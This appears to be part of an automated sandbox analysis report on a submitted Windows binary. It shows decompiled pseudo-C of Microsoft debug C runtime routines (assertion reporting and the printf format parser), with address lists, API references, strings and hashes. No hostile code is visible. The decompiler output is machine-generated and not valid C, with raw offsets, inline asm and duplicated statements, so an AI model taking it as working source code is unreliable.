                            								if(( *(0x60b394 +  *(_t263 + 8) * 4) & 0x00000004) != 0) {
                            									 *(_t263 - 0x4030) = 0;
                            									if( *(_t263 + 0x10) != 0) {
                            										E0040DDE0(E0041D6F0(_t263 - 0x4030,  *(_t263 + 0x10), _t263 - 0x4030, 0x1000, 0xa), _t157, L"_itoa_s(nLine, szLineMessage, 4096, 10)", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x1a2, 0);
                            										_t271 = _t271 + 0x28;
                            									}
                            									asm("sbb edx, edx");
                            									_t240 =  *(_t263 + 8);
                            									 *(_t263 - 0x2024) = L00413000(_t208,  *(_t263 + 8), _t259, _t261,  *(_t263 + 8),  *(_t263 + 0xc),  ~( *(_t263 + 0x10)) & _t263 - 0x00004030,  *((intOrPtr*)(_t263 + 0x14)), _t263 - 0x5030);
                            								}
                            							}
                            						}
                            						L58:
                            						 *(_t263 - 4) = 0xfffffffe;
                            						E00417A2F();
                            						_t147 =  *(_t263 - 0x2024);
                            						 *[fs:0x0] =  *((intOrPtr*)(_t263 - 0x10));
                            						_pop(_t260);
                            						_pop(_t262);
                            						_pop(_t209);
                            						return E00416CA0(_t147, _t209,  *(_t263 - 0x1c) ^ _t263, _t240, _t260, _t262);
                            					}
                            				}
                            				E0040DDE0(E0041D6F0(_t210,  *(_t263 + 0x10), _t263 - 0x4030, 0x1000, 0xa), _t204, L"_itoa_s(nLine, szLineMessage, 4096, 10)", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x119, 0);
                            				OutputDebugStringA("Second Chance Assertion Failed: File ");
                            				if( *(_t263 + 0xc) == 0) {
                            					 *(_t263 - 0x5064) = "<file unknown>";
                            				} else {
                            					 *(_t263 - 0x5064) =  *(_t263 + 0xc);
                            				}
                            				_t240 =  *(_t263 - 0x5064);
                            				OutputDebugStringA( *(_t263 - 0x5064));
                            				OutputDebugStringA(", Line ");
                            				OutputDebugStringA(_t263 - 0x4030);
                            				OutputDebugStringA("\n");
                            				E00417230(_t263 - 0x4030);
                            				 *(_t263 - 0x2024) = 0xffffffff;
                            				goto L58;
                            			}






















                            0x0041732e
                            0x0041733b
                            0x004173e8
                            0x004173ee
                            0x004173ff
                            0x0041740a
                            0x00417422
                            0x00417429
                            0x0041742e
                            0x00417431
                            0x0041743e
                            0x00417462
                            0x00417467
                            0x00417467
                            0x0041746a
                            0x0041746f
                            0x00417475
                            0x0041747e
                            0x004174b0
                            0x004174b5
                            0x004174b5
                            0x0041747e
                            0x004174bc
                            0x004174c2
                            0x004174d0
                            0x004174c4
                            0x004174c4
                            0x004174c4
                            0x004174fc
                            0x0041750c
                            0x00417511
                            0x00417511
                            0x00417546
                            0x0041754b
                            0x00417552
                            0x00417554
                            0x00417561
                            0x00417593
                            0x00417598
                            0x00417598
                            0x004175bb
                            0x004175cb
                            0x004175d0
                            0x004175d0
                            0x004175d7
                            0x004176e7
                            0x004176ec
                            0x004175dd
                            0x004175dd
                            0x004175ee
                            0x004175f9
                            0x00417605
                            0x00417606
                            0x00417609
                            0x00417624
                            0x00417629
                            0x0041762c
                            0x00417639
                            0x0041765d
                            0x00417662
                            0x00417662
                            0x00417670
                            0x00417679
                            0x004176ab
                            0x004176b0
                            0x004176b0
                            0x004176b3
                            0x004176ef
                            0x004176f9
                            0x00417718
                            0x00417727
                            0x0041774e
                            0x00417753
                            0x0041775d
                            0x0041778f
                            0x00417794
                            0x00417794
                            0x0041779e
                            0x004177ad
                            0x004177b7
                            0x004177c3
                            0x004177c8
                            0x004177cb
                            0x004177d2
                            0x004177d8
                            0x004177ef
                            0x004177f8
                            0x00417814
                            0x0041781d
                            0x0041781f
                            0x00417824
                            0x004177e9
                            0x00000000
                            0x004177e9
                            0x00417826
                            0x00417836
                            0x00000000
                            0x00417836
                            0x00417847
                            0x004178b7
                            0x004178b7
                            0x004178be
                            0x00000000
                            0x004178be
                            0x00417849
                            0x0041784f
                            0x00417866
                            0x0041786f
                            0x0041788b
                            0x00417894
                            0x00417896
                            0x0041789b
                            0x00417860
                            0x00000000
                            0x00417860
                            0x0041789d
                            0x004178ad
                            0x00000000
                            0x004178ad
                            0x00000000
                            0x004178d0
                            0x004178d0
                            0x004178d7
                            0x004178e4
                            0x004178e6
                            0x004178f0
                            0x00417902
                            0x00417908
                            0x0041790d
                            0x0041790f
                            0x00417919
                            0x0041791f
                            0x0041791f
                            0x0041790d
                            0x0041792c
                            0x0041793f
                            0x0041795e
                            0x00417963
                            0x00417979
                            0x00417979
                            0x0041798c
                            0x00417995
                            0x00417995
                            0x0041799b
                            0x004179a8
                            0x004179aa
                            0x004179b5
                            0x004179e8
                            0x004179ed
                            0x004179ed
                            0x00417a00
                            0x00417a0f
                            0x00417a1b
                            0x00417a1b
                            0x004179a8
                            0x0041792c
                            0x00417a21
                            0x00417a21
                            0x00417a28
                            0x00417a41
                            0x00417a4a
                            0x00417a52
                            0x00417a53
                            0x00417a54
                            0x00417a62
                            0x00417a62
                            0x0041779e
                            0x00417372
                            0x0041737f
                            0x00417389
                            0x00417396
                            0x0041738b
                            0x0041738e
                            0x0041738e
                            0x004173a0
                            0x004173a7
                            0x004173b2
                            0x004173bf
                            0x004173ca
                            0x004173d0
                            0x004173d5
                            0x00000000

                            APIs
                            • InterlockedIncrement.KERNEL32(0060B390), ref: 00417333
                            • __itow_s.LIBCMTD ref: 00417369
                            • __invoke_watson_if_error.LIBCMTD ref: 00417372
                            • OutputDebugStringA.KERNEL32(Second Chance Assertion Failed: File ), ref: 0041737F
                            • OutputDebugStringA.KERNEL32(?), ref: 004173A7
                            • OutputDebugStringA.KERNEL32(, Line ), ref: 004173B2
                            • OutputDebugStringA.KERNEL32(?), ref: 004173BF
                            • OutputDebugStringA.KERNEL32(004018B8), ref: 004173CA
                            • __strftime_l.LIBCMTD ref: 00417429
                            • __invoke_watson_if_oneof.LIBCMTD ref: 00417462
                            • _wcscpy_s.LIBCMTD ref: 004174A7
                            • __invoke_watson_if_error.LIBCMTD ref: 004174B0
                            • _wcscpy_s.LIBCMTD ref: 00417503
                            • __invoke_watson_if_error.LIBCMTD ref: 0041750C
                            • __invoke_watson_if_error.LIBCMTD ref: 00417546
                            • __invoke_watson_if_error.LIBCMTD ref: 00417593
                              • Part of subcall function 0040DDE0: __invoke_watson.LIBCMTD ref: 0040DE01
                            • _wcscat_s.LIBCMTD ref: 0041758A
                              • Part of subcall function 0041A2A0: __invalid_parameter.LIBCMTD ref: 0041A312
                            • _wcscat_s.LIBCMTD ref: 004175C2
                              • Part of subcall function 0041A2A0: _memset.LIBCMT ref: 0041A37B
                              • Part of subcall function 0041A2A0: __invalid_parameter.LIBCMTD ref: 0041A3D7
                            • __invoke_watson_if_error.LIBCMTD ref: 004175CB
                            • __snwprintf_s.LIBCMTD ref: 00417624
                              • Part of subcall function 00416AA0: __vsnprintf_s_l.LIBCMTD ref: 00416AC2
                            • __invoke_watson_if_oneof.LIBCMTD ref: 0041765D
                            • _wcscpy_s.LIBCMTD ref: 004176A2
                            • __invoke_watson_if_error.LIBCMTD ref: 004176AB
                            • __cftoe.LIBCMTD ref: 0041771F
                            • __invoke_watson_if_oneof.LIBCMTD ref: 0041774E
                            • _wcscpy_s.LIBCMTD ref: 00417786
                            • __invoke_watson_if_error.LIBCMTD ref: 0041778F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __invoke_watson_if_error$DebugOutputString$_wcscpy_s$__invoke_watson_if_oneof$__invalid_parameter_wcscat_s$IncrementInterlocked__cftoe__invoke_watson__itow_s__snwprintf_s__strftime_l__vsnprintf_s_l_memset
                            • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $P^-$Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportA$_itoa_s(nLine, szLineMessage, 4096, 10)$e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c$strcat_s(szLineMessage, 4096, "\n")$strcat_s(szLineMessage, 4096, "\r")$strcat_s(szLineMessage, 4096, szUserMessage)$strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")$t8j$t9j$wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")
                            • API String ID: 838256046-3027732266
                            • Opcode ID: 2fc64eadacb16a5661d672192a48589888ac05becb44e9ce8aae8d384ce43c27
                            • Instruction ID: a1556ff1c1dce867f7dbfd301839569e69022267772831db7a138e70fd8ffe22
                            • Opcode Fuzzy Hash: 2fc64eadacb16a5661d672192a48589888ac05becb44e9ce8aae8d384ce43c27
                            • Instruction Fuzzy Hash: BA0285B0E44714ABEB24EF51CC4AFDF7374AB04745F5040AAB608762C1D7B89A84CF99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 64%
                            			E00421FF9(void* __ebx, signed int __edx, void* __edi, void* __esi) {
                            				signed int _t496;
                            				signed int _t518;
                            				void* _t523;
                            				signed int _t525;
                            				void* _t545;
                            				signed int _t563;
                            				signed int _t580;
                            				signed short _t581;
                            				signed int _t584;
                            				signed int _t587;
                            				signed int _t588;
                            				void* _t589;
                            				signed int _t611;
                            				signed int _t647;
                            				signed int _t649;
                            				signed int _t651;
                            				signed int _t658;
                            				signed int _t698;
                            				void* _t699;
                            				void* _t700;
                            				signed int _t701;
                            				void* _t703;
                            				void* _t704;
                            				signed int _t712;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					_t700 = __esi;
                            					_t699 = __edi;
                            					_t647 = __edx;
                            					_t589 = __ebx;
                            					 *(_t701 - 0x10) =  *(_t701 - 0x10) | 0x00000040;
                            					 *(_t701 - 8) = 0xa;
                            					L153:
                            					while(1) {
                            						L153:
                            						while(1) {
                            							L153:
                            							while(1) {
                            								L153:
                            								if(( *(_t701 - 0x10) & 0x00008000) == 0) {
                            									_t649 =  *(_t701 - 0x10) & 0x00001000;
                            									if(_t649 == 0) {
                            										if(( *(_t701 - 0x10) & 0x00000020) == 0) {
                            											_t651 =  *(_t701 - 0x10) & 0x00000040;
                            											if(_t651 == 0) {
                            												_t496 = E0041C290(_t701 + 0x14);
                            												_t704 = _t703 + 4;
                            												 *(_t701 - 0x2b8) = _t496;
                            												 *(_t701 - 0x2b4) = 0;
                            											} else {
                            												_t580 = E0041C290(_t701 + 0x14);
                            												_t704 = _t703 + 4;
                            												asm("cdq");
                            												 *(_t701 - 0x2b8) = _t580;
                            												 *(_t701 - 0x2b4) = _t651;
                            											}
                            										} else {
                            											_t698 =  *(_t701 - 0x10) & 0x00000040;
                            											if(_t698 == 0) {
                            												_t581 = E0041C290(_t701 + 0x14);
                            												_t704 = _t703 + 4;
                            												asm("cdq");
                            												 *(_t701 - 0x2b8) = _t581 & 0x0000ffff;
                            												 *(_t701 - 0x2b4) = _t698;
                            											} else {
                            												_t584 = E0041C290(_t701 + 0x14);
                            												_t704 = _t703 + 4;
                            												asm("cdq");
                            												 *(_t701 - 0x2b8) = _t584;
                            												 *(_t701 - 0x2b4) = _t698;
                            											}
                            										}
                            									} else {
                            										_t587 = E0041C2B0(_t701 + 0x14);
                            										_t704 = _t703 + 4;
                            										 *(_t701 - 0x2b8) = _t587;
                            										 *(_t701 - 0x2b4) = _t649;
                            									}
                            								} else {
                            									_t588 = E0041C2B0(_t701 + 0x14);
                            									_t704 = _t703 + 4;
                            									 *(_t701 - 0x2b8) = _t588;
                            									 *(_t701 - 0x2b4) = _t647;
                            								}
                            								if(( *(_t701 - 0x10) & 0x00000040) == 0) {
                            									L170:
                            									 *(_t701 - 0x2c0) =  *(_t701 - 0x2b8);
                            									 *(_t701 - 0x2bc) =  *(_t701 - 0x2b4);
                            									goto L171;
                            								} else {
                            									L166:
                            									_t712 =  *(_t701 - 0x2b4);
                            									if(_t712 > 0 || _t712 >= 0 &&  *(_t701 - 0x2b8) >= 0) {
                            										goto L170;
                            									} else {
                            										L169:
                            										asm("adc edx, 0x0");
                            										 *(_t701 - 0x2c0) =  ~( *(_t701 - 0x2b8));
                            										 *(_t701 - 0x2bc) =  ~( *(_t701 - 0x2b4));
                            										 *(_t701 - 0x10) =  *(_t701 - 0x10) | 0x00000100;
                            										L171:
                            										if(( *(_t701 - 0x10) & 0x00008000) == 0 && ( *(_t701 - 0x10) & 0x00001000) == 0) {
                            											 *(_t701 - 0x2bc) =  *(_t701 - 0x2bc) & 0x00000000;
                            										}
                            										if( *(_t701 - 0x30) >= 0) {
                            											 *(_t701 - 0x10) =  *(_t701 - 0x10) & 0xfffffff7;
                            											if( *(_t701 - 0x30) > 0x200) {
                            												 *(_t701 - 0x30) = 0x200;
                            											}
                            										} else {
                            											 *(_t701 - 0x30) = 1;
                            										}
                            										if(( *(_t701 - 0x2c0) |  *(_t701 - 0x2bc)) == 0) {
                            											 *(_t701 - 0x1c) = 0;
                            										}
                            										 *((intOrPtr*)(_t701 - 4)) = _t701 - 0x49;
                            										while(1) {
                            											L181:
                            											_t657 =  *(_t701 - 0x30) - 1;
                            											 *(_t701 - 0x30) =  *(_t701 - 0x30) - 1;
                            											if( *(_t701 - 0x30) <= 0 && ( *(_t701 - 0x2c0) |  *(_t701 - 0x2bc)) == 0) {
                            												break;
                            											}
                            											L183:
                            											asm("cdq");
                            											_t658 =  *(_t701 - 0x2c0);
                            											 *((intOrPtr*)(_t701 - 0x2ac)) = E0041CE40(_t658,  *(_t701 - 0x2bc),  *(_t701 - 8), _t657) + 0x30;
                            											asm("cdq");
                            											 *(_t701 - 0x2c0) = E0041CDD0( *(_t701 - 0x2c0),  *(_t701 - 0x2bc),  *(_t701 - 8), _t658);
                            											 *(_t701 - 0x2bc) = _t658;
                            											if( *((intOrPtr*)(_t701 - 0x2ac)) > 0x39) {
                            												 *((intOrPtr*)(_t701 - 0x2ac)) =  *((intOrPtr*)(_t701 - 0x2ac)) +  *((intOrPtr*)(_t701 - 0x260));
                            											}
                            											 *((char*)( *((intOrPtr*)(_t701 - 4)))) =  *((intOrPtr*)(_t701 - 0x2ac));
                            											 *((intOrPtr*)(_t701 - 4)) =  *((intOrPtr*)(_t701 - 4)) - 1;
                            										}
                            										L186:
                            										 *((intOrPtr*)(_t701 - 0x24)) = _t701 - 0x49 -  *((intOrPtr*)(_t701 - 4));
                            										 *((intOrPtr*)(_t701 - 4)) =  *((intOrPtr*)(_t701 - 4)) + 1;
                            										if(( *(_t701 - 0x10) & 0x00000200) != 0 && ( *((intOrPtr*)(_t701 - 0x24)) == 0 ||  *((char*)( *((intOrPtr*)(_t701 - 4)))) != 0x30)) {
                            											 *((intOrPtr*)(_t701 - 4)) =  *((intOrPtr*)(_t701 - 4)) - 1;
                            											 *((char*)( *((intOrPtr*)(_t701 - 4)))) = 0x30;
                            											 *((intOrPtr*)(_t701 - 0x24)) =  *((intOrPtr*)(_t701 - 0x24)) + 1;
                            										}
                            										L190:
                            										while(1) {
                            											L190:
                            											while(1) {
                            												L190:
                            												while(1) {
                            													L190:
                            													while(1) {
                            														L190:
                            														while(1) {
                            															L190:
                            															while(1) {
                            																L190:
                            																while(1) {
                            																	do {
                            																		L190:
                            																		if( *((intOrPtr*)(_t701 - 0x28)) != 0) {
                            																			L216:
                            																			if( *(_t701 - 0x20) != 0) {
                            																				L0040C240( *(_t701 - 0x20), 2);
                            																				_t704 = _t704 + 8;
                            																				 *(_t701 - 0x20) = 0;
                            																			}
                            																			while(1) {
                            																				L218:
                            																				 *(_t701 - 0x251) =  *( *(_t701 + 0xc));
                            																				_t665 =  *(_t701 - 0x251);
                            																				 *(_t701 + 0xc) =  *(_t701 + 0xc) + 1;
                            																				if( *(_t701 - 0x251) == 0 ||  *(_t701 - 0x24c) < 0) {
                            																					break;
                            																				} else {
                            																					if( *(_t701 - 0x251) < 0x20 ||  *(_t701 - 0x251) > 0x78) {
                            																						 *(_t701 - 0x310) = 0;
                            																					} else {
                            																						 *(_t701 - 0x310) =  *( *(_t701 - 0x251) + L"pecifier\", 0)") & 0xf;
                            																					}
                            																				}
                            																				L7:
                            																				 *(_t701 - 0x250) =  *(_t701 - 0x310);
                            																				_t525 =  *(_t701 - 0x250) * 9;
                            																				_t611 =  *(_t701 - 0x25c);
                            																				_t665 = ( *(_t525 + _t611 + 0x4083d0) & 0x000000ff) >> 4;
                            																				 *(_t701 - 0x25c) = ( *(_t525 + _t611 + 0x4083d0) & 0x000000ff) >> 4;
                            																				if( *(_t701 - 0x25c) != 8) {
                            																					L16:
                            																					 *(_t701 - 0x318) =  *(_t701 - 0x25c);
                            																					if( *(_t701 - 0x318) > 7) {
                            																						continue;
                            																					}
                            																					L17:
                            																					switch( *((intOrPtr*)( *(_t701 - 0x318) * 4 +  &M004225E0))) {
                            																						case 0:
                            																							L18:
                            																							 *(_t701 - 0xc) = 0;
                            																							_t528 = E00419390( *(_t701 - 0x251) & 0x000000ff, E0040D3B0(_t701 - 0x40));
                            																							_t707 = _t704 + 8;
                            																							if(_t528 == 0) {
                            																								L24:
                            																								E004226F0( *(_t701 - 0x251) & 0x000000ff,  *(_t701 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
                            																								_t704 = _t707 + 0xc;
                            																								goto L218;
                            																							} else {
                            																								E004226F0( *((intOrPtr*)(_t701 + 8)),  *(_t701 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
                            																								_t707 = _t707 + 0xc;
                            																								_t616 =  *( *(_t701 + 0xc));
                            																								 *(_t701 - 0x251) =  *( *(_t701 + 0xc));
                            																								_t665 =  *(_t701 + 0xc) + 1;
                            																								 *(_t701 + 0xc) = _t665;
                            																								asm("sbb eax, eax");
                            																								 *(_t701 - 0x27c) =  ~( ~( *(_t701 - 0x251)));
                            																								if(_t665 == 0) {
                            																									_push(L"(ch != _T(\'\\0\'))");
                            																									_push(0);
                            																									_push(0x486);
                            																									_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            																									_push(2);
                            																									_t540 = L0040E1A0();
                            																									_t707 = _t707 + 0x14;
                            																									if(_t540 == 1) {
                            																										asm("int3");
                            																									}
                            																								}
                            																								L22:
                            																								if( *(_t701 - 0x27c) != 0) {
                            																									goto L24;
                            																								} else {
                            																									 *((intOrPtr*)(L0040EC70(_t616))) = 0x16;
                            																									E00411A50(_t589, _t616, _t699, _t700, L"(ch != _T(\'\\0\'))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x486, 0);
                            																									 *(_t701 - 0x2f4) = 0xffffffff;
                            																									E0040D380(_t701 - 0x40);
                            																									_t518 =  *(_t701 - 0x2f4);
                            																									goto L229;
                            																								}
                            																							}
                            																						case 1:
                            																							L25:
                            																							 *(__ebp - 0x2c) = 0;
                            																							__edx =  *(__ebp - 0x2c);
                            																							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                            																							__eax =  *(__ebp - 0x28);
                            																							 *(__ebp - 0x18) =  *(__ebp - 0x28);
                            																							__ecx =  *(__ebp - 0x18);
                            																							 *(__ebp - 0x1c) = __ecx;
                            																							 *(__ebp - 0x10) = 0;
                            																							 *(__ebp - 0x30) = 0xffffffff;
                            																							 *(__ebp - 0xc) = 0;
                            																							goto L218;
                            																						case 2:
                            																							L26:
                            																							__edx =  *((char*)(__ebp - 0x251));
                            																							 *(__ebp - 0x31c) =  *((char*)(__ebp - 0x251));
                            																							 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
                            																							 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
                            																							if( *(__ebp - 0x31c) > 0x10) {
                            																								goto L33;
                            																							}
                            																							L27:
                            																							__ecx =  *(__ebp - 0x31c);
                            																							_t74 = __ecx + 0x422618; // 0x498d04
                            																							__edx =  *_t74 & 0x000000ff;
                            																							switch( *((intOrPtr*)(( *_t74 & 0x000000ff) * 4 +  &M00422600))) {
                            																								case 0:
                            																									goto L30;
                            																								case 1:
                            																									goto L31;
                            																								case 2:
                            																									goto L29;
                            																								case 3:
                            																									goto L28;
                            																								case 4:
                            																									goto L32;
                            																								case 5:
                            																									goto L33;
                            																							}
                            																						case 3:
                            																							L34:
                            																							__edx =  *((char*)(__ebp - 0x251));
                            																							if( *((char*)(__ebp - 0x251)) != 0x2a) {
                            																								__eax =  *(__ebp - 0x18);
                            																								__eax =  *(__ebp - 0x18) * 0xa;
                            																								__ecx =  *((char*)(__ebp - 0x251));
                            																								_t98 = __ecx - 0x30; // -48
                            																								__edx = __eax + _t98;
                            																								 *(__ebp - 0x18) = __eax + _t98;
                            																							} else {
                            																								__eax = __ebp + 0x14;
                            																								 *(__ebp - 0x18) = E0041C290(__ebp + 0x14);
                            																								if( *(__ebp - 0x18) < 0) {
                            																									__ecx =  *(__ebp - 0x10);
                            																									__ecx =  *(__ebp - 0x10) | 0x00000004;
                            																									 *(__ebp - 0x10) = __ecx;
                            																									 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
                            																									 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
                            																								}
                            																							}
                            																							goto L218;
                            																						case 4:
                            																							L40:
                            																							 *(__ebp - 0x30) = 0;
                            																							goto L218;
                            																						case 5:
                            																							L41:
                            																							__eax =  *((char*)(__ebp - 0x251));
                            																							if( *((char*)(__ebp - 0x251)) != 0x2a) {
                            																								 *(__ebp - 0x30) =  *(__ebp - 0x30) * 0xa;
                            																								_t109 =  *((char*)(__ebp - 0x251)) - 0x30; // -48
                            																								__ecx =  *(__ebp - 0x30) * 0xa + _t109;
                            																								 *(__ebp - 0x30) = __ecx;
                            																							} else {
                            																								__ecx = __ebp + 0x14;
                            																								 *(__ebp - 0x30) = E0041C290(__ebp + 0x14);
                            																								if( *(__ebp - 0x30) < 0) {
                            																									 *(__ebp - 0x30) = 0xffffffff;
                            																								}
                            																							}
                            																							goto L218;
                            																						case 6:
                            																							L47:
                            																							__edx =  *((char*)(__ebp - 0x251));
                            																							 *(__ebp - 0x320) =  *((char*)(__ebp - 0x251));
                            																							 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
                            																							 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
                            																							if( *(__ebp - 0x320) > 0x2e) {
                            																								L70:
                            																								goto L218;
                            																							}
                            																							L48:
                            																							__ecx =  *(__ebp - 0x320);
                            																							_t117 = __ecx + 0x422640; // 0x1e4e9003
                            																							__edx =  *_t117 & 0x000000ff;
                            																							switch( *((intOrPtr*)(( *_t117 & 0x000000ff) * 4 +  &M0042262C))) {
                            																								case 0:
                            																									L53:
                            																									__edx =  *(__ebp + 0xc);
                            																									__eax =  *( *(__ebp + 0xc));
                            																									if( *( *(__ebp + 0xc)) != 0x36) {
                            																										L56:
                            																										__edx =  *(__ebp + 0xc);
                            																										__eax =  *( *(__ebp + 0xc));
                            																										if( *( *(__ebp + 0xc)) != 0x33) {
                            																											L59:
                            																											__edx =  *(__ebp + 0xc);
                            																											__eax =  *( *(__ebp + 0xc));
                            																											if( *( *(__ebp + 0xc)) == 0x64) {
                            																												L65:
                            																												L67:
                            																												goto L70;
                            																											}
                            																											L60:
                            																											__ecx =  *(__ebp + 0xc);
                            																											__edx =  *__ecx;
                            																											if( *__ecx == 0x69) {
                            																												goto L65;
                            																											}
                            																											L61:
                            																											__eax =  *(__ebp + 0xc);
                            																											__ecx =  *( *(__ebp + 0xc));
                            																											if(__ecx == 0x6f) {
                            																												goto L65;
                            																											}
                            																											L62:
                            																											__edx =  *(__ebp + 0xc);
                            																											__eax =  *( *(__ebp + 0xc));
                            																											if( *( *(__ebp + 0xc)) == 0x75) {
                            																												goto L65;
                            																											}
                            																											L63:
                            																											__ecx =  *(__ebp + 0xc);
                            																											__edx =  *__ecx;
                            																											if( *__ecx == 0x78) {
                            																												goto L65;
                            																											}
                            																											L64:
                            																											__eax =  *(__ebp + 0xc);
                            																											__ecx =  *( *(__ebp + 0xc));
                            																											if(__ecx != 0x58) {
                            																												L66:
                            																												 *(__ebp - 0x25c) = 0;
                            																												goto L18;
                            																											}
                            																											goto L65;
                            																										}
                            																										L57:
                            																										__ecx =  *(__ebp + 0xc);
                            																										__edx =  *((char*)(__ecx + 1));
                            																										if( *((char*)(__ecx + 1)) != 0x32) {
                            																											goto L59;
                            																										}
                            																										L58:
                            																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            																										__ecx =  *(__ebp - 0x10);
                            																										__ecx =  *(__ebp - 0x10) & 0xffff7fff;
                            																										 *(__ebp - 0x10) = __ecx;
                            																										goto L67;
                            																									}
                            																									L54:
                            																									__ecx =  *(__ebp + 0xc);
                            																									__edx =  *((char*)(__ecx + 1));
                            																									if( *((char*)(__ecx + 1)) != 0x34) {
                            																										goto L56;
                            																									}
                            																									L55:
                            																									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            																									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            																									__ecx =  *(__ebp - 0x10);
                            																									__ecx =  *(__ebp - 0x10) | 0x00008000;
                            																									 *(__ebp - 0x10) = __ecx;
                            																									goto L67;
                            																								case 1:
                            																									L68:
                            																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
                            																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
                            																									goto L70;
                            																								case 2:
                            																									L49:
                            																									__eax =  *(__ebp + 0xc);
                            																									__ecx =  *( *(__ebp + 0xc));
                            																									if(__ecx != 0x6c) {
                            																										__ecx =  *(__ebp - 0x10);
                            																										__ecx =  *(__ebp - 0x10) | 0x00000010;
                            																										 *(__ebp - 0x10) = __ecx;
                            																									} else {
                            																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
                            																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
                            																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            																									}
                            																									goto L70;
                            																								case 3:
                            																									L69:
                            																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
                            																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
                            																									goto L70;
                            																								case 4:
                            																									goto L70;
                            																							}
                            																						case 7:
                            																							goto L71;
                            																						case 8:
                            																							L30:
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
                            																							goto L33;
                            																						case 9:
                            																							L31:
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            																							goto L33;
                            																						case 0xa:
                            																							L29:
                            																							__ecx =  *(__ebp - 0x10);
                            																							__ecx =  *(__ebp - 0x10) | 0x00000001;
                            																							 *(__ebp - 0x10) = __ecx;
                            																							goto L33;
                            																						case 0xb:
                            																							L28:
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            																							goto L33;
                            																						case 0xc:
                            																							L32:
                            																							__ecx =  *(__ebp - 0x10);
                            																							__ecx =  *(__ebp - 0x10) | 0x00000008;
                            																							 *(__ebp - 0x10) = __ecx;
                            																							goto L33;
                            																						case 0xd:
                            																							L33:
                            																							goto L218;
                            																					}
                            																				} else {
                            																					if(0 == 0) {
                            																						 *(_t701 - 0x314) = 0;
                            																					} else {
                            																						 *(_t701 - 0x314) = 1;
                            																					}
                            																					_t618 =  *(_t701 - 0x314);
                            																					 *(_t701 - 0x278) =  *(_t701 - 0x314);
                            																					if( *(_t701 - 0x278) == 0) {
                            																						_push(L"(\"Incorrect format specifier\", 0)");
                            																						_push(0);
                            																						_push(0x460);
                            																						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            																						_push(2);
                            																						_t545 = L0040E1A0();
                            																						_t704 = _t704 + 0x14;
                            																						if(_t545 == 1) {
                            																							asm("int3");
                            																						}
                            																					}
                            																					L14:
                            																					if( *(_t701 - 0x278) != 0) {
                            																						goto L16;
                            																					} else {
                            																						 *((intOrPtr*)(L0040EC70(_t618))) = 0x16;
                            																						E00411A50(_t589, _t618, _t699, _t700, L"(\"Incorrect format specifier\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
                            																						 *(_t701 - 0x2f0) = 0xffffffff;
